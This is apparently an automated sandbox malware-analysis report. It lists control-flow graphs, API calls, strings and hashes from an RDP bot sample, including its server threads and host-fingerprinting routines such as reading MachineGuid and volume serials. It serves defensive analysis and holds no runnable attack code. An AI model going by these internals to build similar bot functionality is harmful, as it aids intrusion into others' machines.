7ff6be032a05-7ff6be032a0e 64->66 65->66 70 7ff6be0329ce-7ff6be0329f1 fread 65->70 68 7ff6be032a3d-7ff6be032a60 call 7ff6be0399e2 66->68 69 7ff6be032a10-7ff6be032a12 66->69 71 7ff6be032a14-7ff6be032a19 68->71 69->71 72 7ff6be032a62-7ff6be032a67 69->72 70->66 74 7ff6be0329f3 70->74 71->37 75 7ff6be032a1f-7ff6be032a38 GetProcessHeap HeapFree 71->75 77 7ff6be032a69-7ff6be032a6f 72->77 78 7ff6be032a74-7ff6be032a7d 72->78 79 7ff6be0329f9-7ff6be0329fc 74->79 80 7ff6be032945-7ff6be03296e _errno call 7ff6be0399e2 _errno 74->80 75->37 77->37 78->77 79->64 83 7ff6be032970-7ff6be03297d 80->83 84 7ff6be0329a5-7ff6be0329b3 _errno 80->84 83->84 84->64
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fclosefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                                                                                                                  • API String ID: 2897271634-4162578512
                                                                                                                                                  • Opcode ID: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
                                                                                                                                                  • Instruction ID: a98f556bef790596188a3b22a663e00200f1627fc66f366a53f883346d779905
                                                                                                                                                  • Opcode Fuzzy Hash: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
                                                                                                                                                  • Instruction Fuzzy Hash: AAD14D61A09A4782FA209B5DE940BB82371BF78784F554133EB4ED72A5EE3CE566C301
                                                                                                                                                  Function 00007FF8BFB36941 Relevance: 66.8, APIs: 10, Strings: 28, Instructions: 327threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 85 7ff8bfb36941-7ff8bfb36964 InitializeCriticalSectionAndSpinCount 86 7ff8bfb3696a-7ff8bfb36991 InitializeCriticalSectionAndSpinCount 85->86 87 7ff8bfb36aec-7ff8bfb36b0d GetLastError call 7ff8bfb3a202 85->87 88 7ff8bfb36c08-7ff8bfb36c29 GetLastError call 7ff8bfb3a202 86->88 89 7ff8bfb36997-7ff8bfb369a7 86->89 99 7ff8bfb36b0f 87->99 100 7ff8bfb36b27-7ff8bfb36b2d 87->100 105 7ff8bfb36c2b 88->105 106 7ff8bfb36c43-7ff8bfb36c49 88->106 92 7ff8bfb36fda-7ff8bfb36ff2 call 7ff8bfb3a202 89->92 93 7ff8bfb369ad-7ff8bfb369e5 CreateThread 89->93 108 7ff8bfb36ff7-7ff8bfb36ffe 92->108 97 7ff8bfb369eb-7ff8bfb36a07 call 7ff8bfb3a202 93->97 98 7ff8bfb36ce0-7ff8bfb36d01 GetLastError call 7ff8bfb3a202 93->98 97->92 118 7ff8bfb36a0d-7ff8bfb36a45 CreateThread 97->118 122 7ff8bfb36d03 98->122 123 7ff8bfb36d17-7ff8bfb36d1d 98->123 101 7ff8bfb36bb8 99->101 102 7ff8bfb36b15-7ff8bfb36b22 99->102 103 7ff8bfb36bcc 100->103 104 7ff8bfb36b33-7ff8bfb36b39 100->104 101->103 102->100 121 7ff8bfb36bd6 103->121 111 7ff8bfb36b3b-7ff8bfb36b41 104->111 112 7ff8bfb36b65-7ff8bfb36b68 104->112 113 7ff8bfb36c31-7ff8bfb36c3e 105->113 114 7ff8bfb36fd5 105->114 116 7ff8bfb36fff-7ff8bfb37004 106->116 117 7ff8bfb36c4f-7ff8bfb36c55 106->117 119 7ff8bfb36b47-7ff8bfb36b4d 111->119 120 7ff8bfb36bf4 111->120 126 7ff8bfb36b6a-7ff8bfb36b6d 112->126 127 7ff8bfb36b7e-7ff8bfb36b84 112->127 113->106 114->92 116->92 124 7ff8bfb36c81-7ff8bfb36c84 117->124 125 7ff8bfb36c57-7ff8bfb36c5d 117->125 128 7ff8bfb36a4b-7ff8bfb36a67 call 7ff8bfb3a202 118->128 129 7ff8bfb36de8-7ff8bfb36e09 GetLastError call 7ff8bfb3a202 118->129 130 7ff8bfb36bfe 119->130 131 7ff8bfb36b53-7ff8bfb36b59 119->131 120->130 148 7ff8bfb36be0 121->148 132 7ff8bfb36d7a-7ff8bfb36d8a 122->132 133 7ff8bfb36d05-7ff8bfb36d12 122->133 136 7ff8bfb36d1f 123->136 137 7ff8bfb36d4d-7ff8bfb36d5d 123->137 139 7ff8bfb36ca2-7ff8bfb36ca8 124->139 140 7ff8bfb36c86-7ff8bfb36c89 124->140 134 7ff8bfb3701b-7ff8bfb37020 125->134 135 7ff8bfb36c63-7ff8bfb36c69 125->135 126->121 138 7ff8bfb36b6f-7ff8bfb36b72 126->138 141 7ff8bfb36bea 127->141 142 7ff8bfb36b86 127->142 128->92 171 7ff8bfb36a6d-7ff8bfb36aa5 CreateThread 128->171 169 7ff8bfb36e0b 129->169 170 7ff8bfb36e1f-7ff8bfb36e25 129->170 130->88 143 7ff8bfb36b5b 131->143 144 7ff8bfb36b90 131->144 132->92 133->123 134->92 146 7ff8bfb36c6f-7ff8bfb36c75 135->146 147 7ff8bfb37022-7ff8bfb37027 135->147 155 7ff8bfb36d62-7ff8bfb36d68 136->155 156 7ff8bfb36d21-7ff8bfb36d24 136->156 137->92 138->148 149 7ff8bfb36b74 138->149 152 7ff8bfb36cae-7ff8bfb36cb3 139->152 153 7ff8bfb37014-7ff8bfb37019 139->153 150 7ff8bfb36c8f-7ff8bfb36c92 140->150 151 7ff8bfb37006-7ff8bfb3700b 140->151 141->120 142->144 143->112 144->101 160 7ff8bfb36cb8-7ff8bfb36cbd 146->160 161 7ff8bfb36c77-7ff8bfb36c7c 146->161 147->92 148->141 149->127 162 7ff8bfb36c98-7ff8bfb36c9d 150->162 163 7ff8bfb3700d-7ff8bfb37012 150->163 151->92 152->92 153->92 157 7ff8bfb36d6a-7ff8bfb36d70 155->157 158 7ff8bfb36d30-7ff8bfb36d40 155->158 165 7ff8bfb36d26-7ff8bfb36d29 156->165 166 7ff8bfb36d45-7ff8bfb36d4b 156->166 167 7ff8bfb36d8f-7ff8bfb36d9f 157->167 168 7ff8bfb36d72-7ff8bfb36d78 157->168 158->92 160->92 161->92 162->92 163->92 172 7ff8bfb36d2b-7ff8bfb36d2e 165->172 173 7ff8bfb36da4-7ff8bfb36db4 165->173 166->132 166->137 167->92 168->132 168->137 174 7ff8bfb36e0d-7ff8bfb36e1a 169->174 175 7ff8bfb36e82-7ff8bfb36e92 169->175 176 7ff8bfb36e27 170->176 177 7ff8bfb36e55-7ff8bfb36e65 170->177 178 7ff8bfb36aab-7ff8bfb36ac7 call 7ff8bfb3a202 171->178 179 7ff8bfb36ee6-7ff8bfb36f07 GetLastError call 7ff8bfb3a202 171->179 172->132 172->158 173->92 174->170 175->92 180 7ff8bfb36e6a-7ff8bfb36e70 176->180 181 7ff8bfb36e29-7ff8bfb36e2c 176->181 177->92 178->92 194 7ff8bfb36acd-7ff8bfb36ae2 call 7ff8bfb3a202 178->194 195 7ff8bfb36f09 179->195 196 7ff8bfb36f1d-7ff8bfb36f23 179->196 186 7ff8bfb36e38-7ff8bfb36e48 180->186 187 7ff8bfb36e72-7ff8bfb36e78 180->187 184 7ff8bfb36e2e-7ff8bfb36e31 181->184 185 7ff8bfb36e4d-7ff8bfb36e53 181->185 190 7ff8bfb36eac-7ff8bfb36ebc 184->190 191 7ff8bfb36e33-7ff8bfb36e36 184->191 185->175 185->177 186->92 192 7ff8bfb36e7a-7ff8bfb36e80 187->192 193 7ff8bfb36e97-7ff8bfb36ea7 187->193 190->92 191->175 191->186 192->175 192->177 193->92 204 7ff8bfb36ae7 194->204 197 7ff8bfb36f0b-7ff8bfb36f18 195->197 198 7ff8bfb36f3f-7ff8bfb36f4f 195->198 199 7ff8bfb36f7d-7ff8bfb36f8d 196->199 200 7ff8bfb36f25 196->200 197->196 198->92 199->92 202 7ff8bfb36f27-7ff8bfb36f2d 200->202 203 7ff8bfb36f54-7ff8bfb36f57 200->203 205 7ff8bfb36f2f-7ff8bfb36f35 202->205 206 7ff8bfb36f63-7ff8bfb36f73 202->206 207 7ff8bfb36f59-7ff8bfb36f5c 203->207 208 7ff8bfb36f75-7ff8bfb36f7b 203->208 204->108 209 7ff8bfb36f8f-7ff8bfb36f9f 205->209 210 7ff8bfb36f37-7ff8bfb36f3d 205->210 206->92 211 7ff8bfb36f5e-7ff8bfb36f61 207->211 212 7ff8bfb36fa1-7ff8bfb36fb1 207->212 208->198 208->199 209->92 210->198 210->199 211->198 211->206 212->92
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
                                                                                                                                                  • API String ID: 3214881788-719614687
                                                                                                                                                  • Opcode ID: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                                                                                                                                                  • Instruction ID: 5c939acfee436a84d99edd7ecbbd509eb802bb114f707f60d5d1114badbe8287
                                                                                                                                                  • Opcode Fuzzy Hash: e9a884daacb212d4b5132a2dbbe38604ce4ccd71cb5146d75cfab6842fa0af2b
                                                                                                                                                  • Instruction Fuzzy Hash: 58F11424ACC74781FB249B8CE9947782352AF043E4F60033AD77E066E5DE6DB9899346
                                                                                                                                                  Function 00007FF8BFB84BC0 Relevance: 58.0, APIs: 11, Strings: 22, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 213 7ff8bfb84bc0-7ff8bfb84bda call 7ff8bfb844a4 216 7ff8bfb850f2 213->216 217 7ff8bfb84be0-7ff8bfb84bf5 call 7ff8bfb84423 213->217 219 7ff8bfb85106-7ff8bfb8510b 216->219 221 7ff8bfb84c4b 217->221 222 7ff8bfb84bf7-7ff8bfb84c25 217->222 223 7ff8bfb84c5d-7ff8bfb84c74 call 7ff8bfb81292 219->223 224 7ff8bfb84c50-7ff8bfb84c5b FreeLibrary 221->224 229 7ff8bfb84c2e-7ff8bfb84c49 call 7ff8bfb81292 222->229 230 7ff8bfb84c27-7ff8bfb84c2c 222->230 228 7ff8bfb84c79-7ff8bfb84c86 223->228 224->223 227 7ff8bfb84c87-7ff8bfb84cc0 GetNativeSystemInfo GetWindowsDirectoryA 224->227 231 7ff8bfb84d9e-7ff8bfb84dc1 call 7ff8bfb81292 227->231 232 7ff8bfb84cc6-7ff8bfb84ce7 GetLastError call 7ff8bfb81292 227->232 229->224 230->224 231->223 241 7ff8bfb84dc7-7ff8bfb84dfd call 7ff8bfb8d6c2 231->241 239 7ff8bfb84ce9 232->239 240 7ff8bfb84d07-7ff8bfb84d0d 232->240 242 7ff8bfb84cfd-7ff8bfb84d02 239->242 243 7ff8bfb84ceb-7ff8bfb84cf8 239->243 240->219 245 7ff8bfb84d13-7ff8bfb84d19 240->245 249 7ff8bfb84eae-7ff8bfb84eca call 7ff8bfb81292 241->249 250 7ff8bfb84e03-7ff8bfb84e05 241->250 242->223 243->242 247 7ff8bfb84d1b-7ff8bfb84d1e 245->247 248 7ff8bfb84d52-7ff8bfb84d58 245->248 251 7ff8bfb84d3c-7ff8bfb84d42 247->251 252 7ff8bfb84d20-7ff8bfb84d23 247->252 253 7ff8bfb8512e-7ff8bfb85133 248->253 254 7ff8bfb84d5e-7ff8bfb84d64 248->254 263 7ff8bfb84ecf 249->263 250->223 255 7ff8bfb84e0b-7ff8bfb84e68 GetVolumeInformationA 250->255 258 7ff8bfb84d48-7ff8bfb84d4d 251->258 259 7ff8bfb85124-7ff8bfb85129 251->259 256 7ff8bfb84d29-7ff8bfb84d2c 252->256 257 7ff8bfb85110-7ff8bfb85115 252->257 253->223 260 7ff8bfb84d6a-7ff8bfb84d70 254->260 261 7ff8bfb85138-7ff8bfb8513d 254->261 264 7ff8bfb84e6e-7ff8bfb84e94 GetLastError call 7ff8bfb81292 255->264 265 7ff8bfb84f6b-7ff8bfb84f9d call 7ff8bfb81292 255->265 266 7ff8bfb8511a-7ff8bfb8511f 256->266 267 7ff8bfb84d32-7ff8bfb84d37 256->267 257->223 258->223 259->223 268 7ff8bfb84d76-7ff8bfb84d7b 260->268 269 7ff8bfb85142-7ff8bfb85147 260->269 261->223 263->250 276 7ff8bfb84e96 264->276 277 7ff8bfb84ed4-7ff8bfb84eda 264->277 274 7ff8bfb84f9f-7ff8bfb84fab strlen 265->274 275 7ff8bfb84fb1-7ff8bfb84fb8 265->275 266->223 267->223 268->223 269->223 274->275 278 7ff8bfb85073-7ff8bfb85077 274->278 281 7ff8bfb84fbc-7ff8bfb85019 call 7ff8bfb81292 275->281 282 7ff8bfb84e9c-7ff8bfb84ea9 276->282 283 7ff8bfb85023-7ff8bfb85028 276->283 279 7ff8bfb85037-7ff8bfb8503c 277->279 280 7ff8bfb84ee0 277->280 278->275 287 7ff8bfb8507d-7ff8bfb85081 278->287 279->223 284 7ff8bfb84f19-7ff8bfb84f1f 280->284 285 7ff8bfb84ee2-7ff8bfb84ee5 280->285 290 7ff8bfb8501e 281->290 282->249 283->223 291 7ff8bfb8505f-7ff8bfb85064 284->291 292 7ff8bfb84f25-7ff8bfb84f2b 284->292 288 7ff8bfb84ee7-7ff8bfb84eea 285->288 289 7ff8bfb84f03-7ff8bfb84f09 285->289 287->275 293 7ff8bfb85087-7ff8bfb850ba _errno strtol _errno 287->293 296 7ff8bfb85041-7ff8bfb85046 288->296 297 7ff8bfb84ef0-7ff8bfb84ef3 288->297 298 7ff8bfb84f0f-7ff8bfb84f14 289->298 299 7ff8bfb85055-7ff8bfb8505a 289->299 290->228 291->223 300 7ff8bfb85069-7ff8bfb8506e 292->300 301 7ff8bfb84f31-7ff8bfb84f37 292->301 294 7ff8bfb850bc-7ff8bfb850bf 293->294 295 7ff8bfb850ca-7ff8bfb850ed _errno call 7ff8bfb81292 293->295 294->281 302 7ff8bfb850c5 294->302 295->275 296->223 304 7ff8bfb8504b-7ff8bfb85050 297->304 305 7ff8bfb84ef9-7ff8bfb84efe 297->305 298->223 299->223 300->223 306 7ff8bfb84f39-7ff8bfb84f3e 301->306 307 7ff8bfb84f43-7ff8bfb84f48 301->307 302->275 304->223 305->223 306->223 307->223
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                                                                                                                                                  • Instruction ID: 496679b481f52713cffa1383241b7b3b0ca25ccd83f21ba4c5202b7748923bf6
                                                                                                                                                  • Opcode Fuzzy Hash: 5ca80b4570f46501d07f7dc98a807199eaaf2e9cd8eb9a92f5d868f2bd45693d
                                                                                                                                                  • Instruction Fuzzy Hash: 0FD1A021E0C657C1FB249B9CE4807B867A0AF857D8F559037CB5E476A6DE2CEC84C781
                                                                                                                                                  Function 00007FF8BA4F3420 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 505 7ff8ba4f3420-7ff8ba4f343a call 7ff8ba4f9ff4 508 7ff8ba4f3952 505->508 509 7ff8ba4f3440-7ff8ba4f3455 call 7ff8ba4f9f73 505->509 512 7ff8ba4f3966-7ff8ba4f396b 508->512 513 7ff8ba4f3457-7ff8ba4f3485 509->513 514 7ff8ba4f34ab 509->514 515 7ff8ba4f34bd-7ff8ba4f34d4 call 7ff8ba4f1292 512->515 521 7ff8ba4f3487-7ff8ba4f348c 513->521 522 7ff8ba4f348e-7ff8ba4f34a9 call 7ff8ba4f1292 513->522 516 7ff8ba4f34b0-7ff8ba4f34bb FreeLibrary 514->516 520 7ff8ba4f34d9-7ff8ba4f34e6 515->520 516->515 519 7ff8ba4f34e7-7ff8ba4f3520 GetNativeSystemInfo GetWindowsDirectoryA 516->519 523 7ff8ba4f3526-7ff8ba4f3547 GetLastError call 7ff8ba4f1292 519->523 524 7ff8ba4f35fe-7ff8ba4f3621 call 7ff8ba4f1292 519->524 521->516 522->516 531 7ff8ba4f3567-7ff8ba4f356d 523->531 532 7ff8ba4f3549 523->532 524->515 533 7ff8ba4f3627-7ff8ba4f365d call 7ff8ba4f8702 524->533 531->512 537 7ff8ba4f3573-7ff8ba4f3579 531->537 534 7ff8ba4f355d-7ff8ba4f3562 532->534 535 7ff8ba4f354b-7ff8ba4f3558 532->535 541 7ff8ba4f3663-7ff8ba4f3665 533->541 542 7ff8ba4f370e-7ff8ba4f372a call 7ff8ba4f1292 533->542 534->515 535->534 539 7ff8ba4f35b2-7ff8ba4f35b8 537->539 540 7ff8ba4f357b-7ff8ba4f357e 537->540 545 7ff8ba4f398e-7ff8ba4f3993 539->545 546 7ff8ba4f35be-7ff8ba4f35c4 539->546 543 7ff8ba4f3580-7ff8ba4f3583 540->543 544 7ff8ba4f359c-7ff8ba4f35a2 540->544 541->515 550 7ff8ba4f366b-7ff8ba4f36c8 GetVolumeInformationA 541->550 557 7ff8ba4f372f 542->557 551 7ff8ba4f3970-7ff8ba4f3975 543->551 552 7ff8ba4f3589-7ff8ba4f358c 543->552 553 7ff8ba4f3984-7ff8ba4f3989 544->553 554 7ff8ba4f35a8-7ff8ba4f35ad 544->554 545->515 547 7ff8ba4f35ca-7ff8ba4f35d0 546->547 548 7ff8ba4f3998-7ff8ba4f399d 546->548 555 7ff8ba4f35d6-7ff8ba4f35db 547->555 556 7ff8ba4f39a2-7ff8ba4f39a7 547->556 548->515 558 7ff8ba4f36ce-7ff8ba4f36f4 GetLastError call 7ff8ba4f1292 550->558 559 7ff8ba4f37cb-7ff8ba4f37fd call 7ff8ba4f1292 550->559 551->515 560 7ff8ba4f3592-7ff8ba4f3597 552->560 561 7ff8ba4f397a-7ff8ba4f397f 552->561 553->515 554->515 555->515 556->515 557->541 568 7ff8ba4f36f6 558->568 569 7ff8ba4f3734-7ff8ba4f373a 558->569 566 7ff8ba4f3811-7ff8ba4f3818 559->566 567 7ff8ba4f37ff-7ff8ba4f380b strlen 559->567 560->515 561->515 573 7ff8ba4f381c-7ff8ba4f3879 call 7ff8ba4f1292 566->573 567->566 570 7ff8ba4f38d3-7ff8ba4f38d7 567->570 574 7ff8ba4f3883-7ff8ba4f3888 568->574 575 7ff8ba4f36fc-7ff8ba4f3709 568->575 571 7ff8ba4f3897-7ff8ba4f389c 569->571 572 7ff8ba4f3740 569->572 570->566 576 7ff8ba4f38dd-7ff8ba4f38e1 570->576 571->515 577 7ff8ba4f3742-7ff8ba4f3745 572->577 578 7ff8ba4f3779-7ff8ba4f377f 572->578 583 7ff8ba4f387e 573->583 574->515 575->542 576->566 580 7ff8ba4f38e7-7ff8ba4f391a _errno call 7ff8ba501118 _errno 576->580 581 7ff8ba4f3747-7ff8ba4f374a 577->581 582 7ff8ba4f3763-7ff8ba4f3769 577->582 584 7ff8ba4f3785-7ff8ba4f378b 578->584 585 7ff8ba4f38bf-7ff8ba4f38c4 578->585 598 7ff8ba4f391c-7ff8ba4f391f 580->598 599 7ff8ba4f392a-7ff8ba4f394d _errno call 7ff8ba4f1292 580->599 587 7ff8ba4f3750-7ff8ba4f3753 581->587 588 7ff8ba4f38a1-7ff8ba4f38a6 581->588 589 7ff8ba4f38b5-7ff8ba4f38ba 582->589 590 7ff8ba4f376f-7ff8ba4f3774 582->590 583->520 591 7ff8ba4f3791-7ff8ba4f3797 584->591 592 7ff8ba4f38c9-7ff8ba4f38ce 584->592 585->515 594 7ff8ba4f38ab-7ff8ba4f38b0 587->594 595 7ff8ba4f3759-7ff8ba4f375e 587->595 588->515 589->515 590->515 596 7ff8ba4f37a3-7ff8ba4f37a8 591->596 597 7ff8ba4f3799-7ff8ba4f379e 591->597 592->515 594->515 595->515 596->515 597->515 598->573 600 7ff8ba4f3925 598->600 599->566 600->566
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                                                  • Opcode ID: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                                                                                                                                                  • Instruction ID: 8edfa61a3ad23a84cb5e80a9d20e3608ab21aee71f1b5c6bc15590d21f6cd4f1
                                                                                                                                                  • Opcode Fuzzy Hash: bc4cb478b8c36a5fe85cd5a1edcd2139b3db3fb45a3deb900e437d1778e96289
                                                                                                                                                  • Instruction Fuzzy Hash: 9CD16F21E0C653C5FB208B9CAC803F826A0AB527D4F5560F2DF5E176A5DF2EB9448391
                                                                                                                                                  Function 00007FF8B9159770 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
